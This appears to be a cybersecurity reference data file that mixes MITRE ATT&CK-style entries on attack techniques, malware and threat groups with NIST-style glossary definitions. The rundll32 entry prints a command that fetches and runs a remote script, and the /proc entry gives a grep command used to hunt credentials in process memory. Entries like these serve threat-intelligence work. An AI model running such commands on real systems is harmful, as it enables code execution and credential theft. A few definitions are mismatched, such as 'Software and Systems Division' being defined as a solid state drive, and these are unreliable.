Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks.

Threat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Term: <em>assurance_level</em>
Definition: The level of assurance (e.g., HIGH, MEDIUM, or LOW) that a claimed signatory possesses the private signature key.

Term: system component
Definition: See system element.

Term: <em>CIPHK(X)</em>
Definition: The forward cipher function of the block cipher algorithm under the key K applied to the data block X.

Term: Traffic Flow Confidentiality (TFC) Padding
Definition: Dummy data added to real data in order to obfuscate the length and frequency of information sent over IPsec.

Term: token
Definition: The means used to confirm the identity of a user, processor, or device (e.g., user password or token).

Name: Bootkit
Type: attack-pattern
Description: Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR). The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.

Term: SCI
Definition: Classified information concerning or derived from intelligence sources, methods, or analytical processes, which is required to be handled within formal access control systems established by the Director of National Intelligence.

Term: systems security engineering
Definition: Systems security engineering is a specialty engineering field strongly related to systems engineering. It applies scientific, engineering, and information assurance principles to deliver trustworthy systems that satisfy stakeholder requirements within their established risk tolerance. 
See also information systems security engineering (ISSE).

Name: Ninja
Type: malware
Description: Ninja is a malware developed in C++ that has been used by ToddyCat to penetrate networks and control remote systems since at least 2020. Ninja is possibly part of a post exploitation toolkit exclusively used by ToddyCat and allows multiple operators to work simultaneously on the same machine. Ninja has been used against government and military entities in Europe and Asia and observed in specific infection chains being deployed by Samurai.

Name: EvilBunny
Type: malware
Description: EvilBunny is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.

Name: Network Denial of Service
Type: attack-pattern
Description: Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion.

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.

Name: Extra Window Memory Injection
Type: attack-pattern
Description: Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. 

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: information security continuous monitoring (ISCM)
Definition: See information security continuous monitoring (ISCM).

Term: 2TDEA
Definition: Two-key Triple Data Encryption Algorithm specified in [NIST SP 800-67].

Term: blended attack
Definition: A type of attack that combines multiple attack methods against one or more vulnerabilities.

Term: assurance of integrity
Definition: A measure of the trust that can be placed in the correctness of the information supplied by an HSN service provider. Integrity includes the ability of the system to provide timely warnings to users when the HSN data should not be used.

Term: Device Cybersecurity Capability Core Baseline
Definition: See core baseline.

Term: Trusted Third Party
Definition: An entity other than the owner and verifier that is trusted by the owner, the verifier, or both to provide certain services.

Term: party
Definition: An individual (person), organization, device or a combination thereof. “Party” is a synonym. In this Recommendation, an entity may be a functional unit that executes certain processes.

Term: Authority Type
Definition: The type of organization that is the authority for the checklist. The three types are Governmental Authority, Software Vendor, and Third Party (e.g., security organizations).

Term: certificate revocation list (CRL)
Definition: A list of digital certificates that have been revoked by an issuing CA before their scheduled expiration date and should no longer be trusted.

Term: Conversation
Definition: Where Web services maintain some state during an interaction that involves multiple messages or participants.

Term: element
Definition: Organizations, entities, or tools employed for the research and development, design, manufacturing, acquisition, delivery, integration, operations and maintenance, and/or disposal of systems and system components.

Term: Byte length
Definition: The number of consecutive (non-overlapping) bytes in a byte string. For example, 0110010101000011 = 01100101 || 01000011 is two bytes long. The byte length of the empty string is zero.

Term: <em>X<< 1</em>
Definition: The bit string that results from discarding the leftmost bit of the bit string X and appending a ‘0’ bit on the right.

Term: federation protocol
Definition: A technical protocol that is used in a federation transaction between networked systems.

Term: Endpoint Protection Platform
Definition: Safeguards implemented through software to protect end-user machines such as workstations and laptops against attack (e.g., antivirus, antispyware, antiadware, personal firewalls, host-based intrusion detection and prevention systems, etc.).

Term: system of records notice
Definition: A notice that federal agencies publish in the Federal Register to describe their system of record.

Term: ID
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable. 
Note: This also encompasses non-person entities (NPEs).

Term: cutting
Definition: The use of a tool or physical technique to break the surface of electronic storage media, potentially breaking the media into two or more pieces and making it difficult or infeasible to recover the data using state-of-the-art laboratory techniques.

Name: IceApple
Type: malware
Description: IceApple is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.

Name: Compiled HTML File
Type: attack-pattern
Description: Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe). 

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.

Term: tactical cross domain solution (CDS)
Definition: A CDS that operates in austere environment conditions or environments where terrestrial communications are not possible. Austere environment conditions include combat and intelligence, surveillance, and reconnaissance (ISR) land, sea, or air vehicles. Terrestrial communications include direct connection to a telecommunications provider via electrical or optical cables, or the use of microwave, radio, or satellite communications. CDSs used in safety-critical environments or CDSs used for direct connection between sensor and shooter (e.g., missile, gun) can also be categorized as tactical.

Term: Software and Systems Division
Definition: A Solid State Drive (SSD) is a storage device that uses solid state memory to store persistent data.

Term: assurance case
Definition: A structured set of arguments and a body of evidence showing that a system satisfies specific claims with respect to a given quality attribute.

Term: type accreditation
Definition: A form of accreditation that is used to authorize multiple instances of a major application or general support system for operation at approved locations with the same type of computing environment. In situations where a major application or general support system is installed at multiple locations, a type accreditation will satisfy Certification and Accreditation (C&A) requirements only if the application or system consists of a common set of tested and approved hardware, software, and firmware. 
See type authorization.

Term: Owner
Definition: A user who can modify the contents of an access control list.

Term: resource
Definition: A passive entity that contains or receives information. Note that access to an object potentially implies access to the information it contains.

Name: Arp
Type: tool
Description: Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache.

Term: Key-derivation method
Definition: A method by which keying material is derived from a shared secret and other information. A key-derivation method may use a key-derivation function or a key-derivation procedure.

Term: Key information
Definition: Information about a key that includes the keying material and associated metadata relating to the key. See Keying material and Metadata.

Term: Global Positioning System
Definition: A system for determining position by comparing radio signals from several satellites.

Term: superuser
Definition: A user who is authorized (and therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform.

Name: Cobian RAT
Type: malware
Description: Cobian RAT is a backdoor, remote access tool that has been observed since 2016.

Term: Random Bit Generator (RBG)
Definition: A device or algorithm that outputs a sequence of binary bits that appears to be statistically independent and unbiased. An RBG is either a DRBG or an NRBG.

Term: Access Control Policy
Definition: The set of rules that define the conditions under which an access may take place.

Name: SolarWinds Compromise
Type: campaign
Description: The SolarWinds Compromise was a sophisticated supply chain cyber operation conducted by APT29 that was discovered in mid-December 2020. APT29 used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. This activity has been labled the StellarParticle campaign in industry reporting. Industry reporting also initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, Dark Halo, and SolarStorm. 

In April 2021, the US and UK governments attributed the SolarWinds Compromise to Russia's Foreign Intelligence Service (SVR); public statements included citations to APT29, Cozy Bear, and The Dukes. The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much smaller number were compromised by follow-on APT29 activity on their systems.

Term: Side-Channel Attack
Definition: An attack enabled by the leakage of information from a physical cryptosystem. Characteristics that could be exploited in a side-channel attack include timing, power consumption, electromagnetic emissions, and acoustic emissions.

Name: Remexi
Type: malware
Description: Remexi is a Windows-based Trojan that was developed in the C programming language.

Term: public key certificate
Definition: A data structure that contains an entity’s identifier(s), the entity's public key and possibly other information, along with a signature on that data set that is generated by a trusted party, i.e. a certificate authority, thereby binding the public key to the included identifier(s).

Term: Validity period
Definition: The period of time during which a certificate is intended to be valid; the period of time between the start date and time and end date and time in a certificate.

Term: CDMA Subscriber Identity Module (CSIM)
Definition: CSIM is an application to support CDMA2000 phones that runs on a UICC, with a file structure derived from the R-UIM card.

Name: At
Type: attack-pattern
Description: Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with at by directly leveraging the Windows Management Instrumentation `Win32_ScheduledJob` WMI class.

On Linux and macOS, at may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke at. If the <code>at.deny</code> exists and is empty, global use of at is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use at.

Adversaries may use at to execute programs at system startup or on a scheduled basis for Persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM).

In Linux environments, adversaries may also abuse at to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, at may also be used for Privilege Escalation if the binary is allowed to run as superuser via <code>sudo</code>.

Term: group order
Definition: Cardinality of the group.

Name: Outer Space
Type: campaign
Description: Outer Space was a campaign conducted by OilRig throughout 2021 that used the SampleCheck5000 downloader and Solar backdoor to target Israeli organizations.

Term: non-ignorable bias
Definition: In the context of de-identification, a bias that results from the suppression or redaction of data based on the value of the suppressed data.

Term: interface
Definition: In a service-oriented architecture, a specification of the operations that a service offers its clients. In WSDL 2.0 an interface component describes sequences of messages that a service sends or receives. In WSDL 1.1 an interface is specified in a portType element.

Term: boundary
Definition: Physical or logical perimeter of a system.

Term: <em>Physical non-deterministic random bit generator</em>
Definition: An entropy source that uses dedicated hardware or uses a physical experiment (noisy diode(s), oscillators, event sampling like radioactive decay, etc.)

Term: Authentication Key
Definition: A private or symmetric key used by an authenticator to generate the authenticator output.

Term: Corporate-Owned Personally-Enabled (COPE)
Definition: A device owned by an enterprise and issued to an employee. Both the enterprise and the employee can install applications onto the device.

Term: Pre-activation state
Definition: A lifecycle state of a key in which the key has been created, but is not yet authorized for use.

Term: Destroyed state
Definition: A lifecycle state of a key whereby the key is no longer available and cannot be reconstructed.

Name: Cloud Groups
Type: attack-pattern
Description: Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts .

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources available to a user for Google. In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API . Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

Name: Network Security Appliances
Type: attack-pattern
Description: Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Term: distributed self-assessment
Definition: The least formal type of assessment; the element judgments are based on the evaluations by small groups that work in parallel.

Term: security architecture
Definition: complying with the principles that drive the system design; i.e., guidelines on the placement and implementation of specific security services within various distributed computing environments.

Term: breadth
Definition: An attribute associated with an assessment method that addresses the scope or coverage of the assessment objects included with the assessment.

Term: digital infrastructure
Definition: The ability to store and exchange data through a centralized communication system. Data communication and exchange are all simplified with the right software and hardware equipment.

Term: infrastructure as code
Definition: The process of managing and provisioning an organization’s IT infrastructure using machine-readable configuration files, rather than employing physical hardware configuration or interactive configuration tools.

Name: Operation Dream Job
Type: campaign
Description: Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.

Term: local element
Definition: A user to whom COMSEC material has been issued a hand receipt. Known in EKMS and KMI as a Local Element.

Name: Proc Filesystem
Type: attack-pattern
Description: Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.

If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

Term: message digest
Definition: The result of applying a hash function to a message.

Term: risk factor
Definition: A characteristic used in a risk model as an input for determining the level of risk in a risk assessment.

Term: penetration
Definition: See intrusion.

Term: Deterministic Random Bit Generator
Definition: A random bit generator that includes a DRBG algorithm and (at least initially) has access to a source of randomness. The DRBG produces a sequence of bits from a secret initial value called a seed. A cryptographic DRBG has the additional property that the output is unpredictable given that the seed is not known. A DRBG is sometimes also called a pseudo-random number generator (PRNG) or a deterministic random number generator.

Name: Add-ins
Type: attack-pattern
Description: Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. 

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

Term: Secret key information
Definition: The key information that needs to be kept secret (i.e., symmetric keys, private keys, key shares and secret metadata).

Term: keying material
Definition: A bit string such that any non-overlapping, contiguous segments of the string with required lengths can be used as secret keys, secret initialization vectors, and other secret parameters.

Term: Certificate owner
Definition: The human(s) responsible for the management of a given certificate.

Name: Socksbot
Type: malware
Description: Socksbot is a backdoor that abuses Socket Secure (SOCKS) proxies.

Term: acceptable use agreement
Definition: See user agreement.

Term: Slack Space
Definition: The unused space in a file allocation block or memory page that may hold residual data.

Term: Zero Trust
Definition: A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. 
Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: AAR
Definition: A document containing findings and recommendations from an exercise or a test.

Term: SCSI
Definition: A magnetic media interface specification. Small Computer System Interface.

Term: inheritance
Definition: A situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, and assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See common control.

Term: public channel
Definition: A communication channel between two parties. Such a channel can be observed and possibly also corrupted by third parties.

Name: SQL Stored Procedures
Type: attack-pattern
Description: Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers. To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server. 

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.). Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.

Term: activity
Definition: Set of cohesive tasks of a process.

Term: Rate
Definition: In the sponge construction, the number of input bits processed per invocation of the underlying function.

Term: Cryptographic algorithm
Definition: A well-defined computational procedure that takes variable inputs, often including a cryptographic key, and produces an output.

Term: trust assumption
Definition: An assumption that characterizes how one expects a specific party to behave when given access to sensitive data.

Term: <em>Clen</em>
Definition: The bit length of the ciphertext.

Term: CUI categories
Definition: Those types of information for which laws, regulations, or government-wide policies require or permit agencies to exercise safeguarding or dissemination controls, and which the CUI Executive Agent has approved and listed in the CUI Registry.

Term: Key-wrapping key
Definition: A symmetric key used to provide confidentiality and integrity protection for other keys.

Name: Caminho
Type: malware
Description: Caminho is a downloader that has been used by threat actors since at least 2025 to deliver various strains of malware such as XWorm.

Term: AC
Definition: The process of granting or denying specific requests for obtaining and using information and related information processing services.

Term: Tier III Checklist
Definition: A checklist in the National Checklist Repository that uses SCAP to document the recommended security settings in machine-readable standardized SCAP formats that meet the definition of “SCAP Expressed” specified in NIST SP 800-126. SCAP Validated products should be able to process Tier III checklists.

Term: Interpreter
Definition: A program that processes a script or other program expression and carries out the requested action, in accordance with the language definition.

Term: facility
Definition: One or more CKMS devices contained within a physically protected enclosure. A facility for a static device is typically a room or building (including their contents) with locks, alarms, and/or guards.

Term: Risk Assessment Methodology
Definition: A risk assessment process, together with a risk model, assessment approach, and analysis approach.

Term: x ´ y
Definition: The product of x and y.

Term: Cyber Incident Response Team
Definition: Group of individuals usually consisting of security analysts organized to develop, recommend, and coordinate immediate mitigation actions for containment, eradication, and recovery resulting from CS incidents. Note: Also called a "Computer Incident Response Team," "Computer Security Incident Response Team (CSIRT)," or a "CIRC (Computer Incident Response Center or a Computer Incident Response Capability)".

Term: compromise
Definition: A judgment, based on the preponderance of the evidence, that a disclosure of information to unauthorized persons or a violation of the security policy for a system in which unauthorized, intentional or unintentional disclosure, modification, destruction, or loss of an object has occurred.

Term: Network Address Translation (NAT)
Definition: A mechanism for mapping addresses on one network to addresses on another network, typically private addresses to public addresses.

Term: <em>L</em>
Definition: An integer specifying the length of the derived keying material KMin bits, which is represented as a binary string when it is an input to a key derivation procedure.

Term: Comparison
Definition: Estimation, calculation, or measurement of similarity or dissimilarity between biometric probe(s) and biometric reference(s).

Term: KMP
Definition: A high-level statement of organizational key management policies that identifies a high-level structure, responsibilities, governing standards, organizational dependencies and other relationships, and security policies.

Term: hash value/result
Definition: The result of applying a hash function to data.

Name: Mark-of-the-Web Bypass
Type: attack-pattern
Description: Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.

Term: credential service provider (CSP)
Definition: The party that manages the subscriber’s primary authentication credentials and issues assertions derived from those credentials. This is commonly the CSP as discussed within this document suite.

Name: Sidewinder
Type: intrusion-set
Description: Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.

Term: URL
Definition: A uniform resource locator, or URL, is a short string containing an address which refers to an object in the "web." URLs are a subset of URIs.

Name: SQLRat
Type: malware
Description: SQLRat is malware that executes SQL scripts to avoid leaving traditional host artifacts. FIN7 has been observed using it.

Term: UMTS Subscriber Identity Module (USIM)
Definition: A module similar to the SIM in GSM/GPRS networks, but with additional capabilities suited to 3G networks.

Term: Deactivated state
Definition: A lifecycle state of a key whereby the key is no longer to be used for applying cryptographic protection. Processing already protected information may still be performed.

Term: control parameter
Definition: See organization-defined control parameter.

Name: HUI Loader
Type: malware
Description: HUI Loader is a custom DLL loader that has been used since at least 2015 by China-based threat groups including Cinnamon Tempest and menuPass to deploy malware on compromised hosts. HUI Loader has been observed in campaigns loading SodaMaster, PlugX, Cobalt Strike, Komplex, and several strains of ransomware.

Term: IT security objective
Definition: See “Security objective”.

Term: Secure Hash Algorithm 3
Definition: Secure Hash Algorithm-3.

Term: URI
Definition: A compact sequence of characters that identifies an abstract or physical resource available on the Internet. The syntax used for URIs is defined in.

Term: bit string
Definition: An ordered sequence of 0 and 1 bits. In this Recommendation, the leftmost bit is the most significant bit of the string. The rightmost bit is the least significant bit of the string.

Name: Pacu
Type: tool
Description: Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.

Term: wander
Definition: The long-term variations—random walk frequency noise—of the significant instants of a digital signal from their ideal position in time (where long-term implies that these variations are of frequency less than 10 Hz).

Term: Password Protected
Definition: The ability to protect a file using a password access control, protecting the data contents from being viewed with the appropriate viewer unless the proper password is entered.

Name: Encrypted Channel
Type: attack-pattern
Description: Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

Term: security relevance
Definition: The functions or constraints that are relied upon to directly or indirectly meet protection needs.

Name: Miner-C
Type: malware
Description: Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread.

Name: CharmPower
Type: malware
Description: CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.

Term: identity proofing
Definition: The process of providing sufficient information (e.g., identity history, credentials, documents) to establish an identity.

Name: CrackMapExec
Type: tool
Description: CrackMapExec, or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks.

Name: Prikormka
Type: malware
Description: Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008.

Term: Key length
Definition: The length of a key in bits; used interchangeably with “Key size”.

Term: impact level
Definition: The assessed worst-case potential impact that could result from a compromise of the confidentiality, integrity, or availability of information expressed as a value of low, moderate or high.

Term: Sponsor (of a certificate)
Definition: A human entity that is responsible for managing a certificate for the non-human entity identified as the subject in the certificate (e.g., a device, application or process). Certificate management includes applying for the certificate, generating the key pair, replacing the certificate when required, and revoking the certificate). Note that a certificate sponsor is also a sponsor of the public key in the certificate and the corresponding private key.

Term: life cycle stages
Definition: The period of time that begins when a system is conceived and ends when the system is no longer available for use.
Refer to life cycle stages.

Term: subsampling
Definition: An algorithmic strategy where the query output is computed using only a fraction of the original data, selected at random.

Name: APT17
Type: intrusion-set
Description: APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.

Term: link encryption family cryptographic interoperability specification (LEF-CIS)
Definition: A standard defining the requirements for bulk data link encryption, similar to Ethernet and HAIPE encryption, but for Link Encryption Family devices.

Term: information security architecture
Definition: An embedded, integral part of the enterprise architecture that describes the structure and behavior for an enterprise’s security processes, information security systems, personnel and organizational subunits, showing their alignment with the enterprise’s mission and strategic plans.

Term: <em>Key specification</em>
Definition: A key specification documents the data format, encryption algorithms, hashing algorithms, signature algorithms, physical media, and data constraints for keys required by a cryptographic device and/or application.

Term: Snapshot
Definition: A record of the state of a running image, generally captured as the differences between an image and the current state.

Name: Rancor
Type: intrusion-set
Description: Rancor is a threat group that has led targeted campaigns against the South East Asia region. Rancor uses politically-motivated lures to entice victims to open malicious documents.

Term: Randomized message
Definition: A message that has been modified using a random value.

Name: PowerLess
Type: malware
Description: PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.

Name: DNS Server
Type: attack-pattern
Description: Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary. Additionally, adversaries may leverage such control in conjunction with Digital Certificates to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications. Alternatively, they may be able to prove ownership of a domain to a SaaS service in order to assert control of the service or create a new administrative Cloud Account. Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.

Name: Micropsia
Type: malware
Description: Micropsia is a remote access tool written in Delphi.

Term: Controller
Definition: A device or program that operates automatically to regulate a controlled variable.

Term: Customer and Others in the IoT Product Ecosystem
